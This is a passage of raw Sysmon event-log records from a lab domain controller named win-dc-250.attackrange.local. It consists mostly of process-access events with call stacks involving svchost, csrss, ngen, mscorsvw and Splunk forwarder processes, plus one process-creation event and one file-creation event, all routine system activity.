Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007795Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.101{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007794Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.101{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007793Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.101{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007792Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.101{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007791Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.101{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007790Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.101{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007789Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.101{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007788Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.101{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007787Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.101{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007786Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.101{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-463F-6000-9303-000000009A01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007785Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.101{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-463F-6000-9303-000000009A01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007784Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.102{08A6967A-463F-6000-9303-000000009A01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007783Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463F-6000-9203-000000009A01}2908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007782Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.023{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-463F-6000-9203-000000009A01}2908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007781Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.023{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463F-6000-9203-000000009A01}2908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007780Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.008{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463E-6000-9103-000000009A01}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007835Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.976{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4640-6000-9C03-000000009A01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007834Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.961{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4640-6000-9C03-000000009A01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007833Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.961{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4640-6000-9C03-000000009A01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007832Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:20.898{08A6967A-4640-6000-9B03-000000009A01}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4b0-0\Microsoft.Activities.Build.dll2021-01-14 13:25:20.898 10341000x80000000000000007831Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.726{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4640-6000-9B03-000000009A01}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007830Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.711{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4640-6000-9B03-000000009A01}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007829Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.711{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4640-6000-9B03-000000009A01}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007828Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.430{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4640-6000-9A03-000000009A01}3540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007827Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.414{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4640-6000-9A03-000000009A01}3540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007826Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 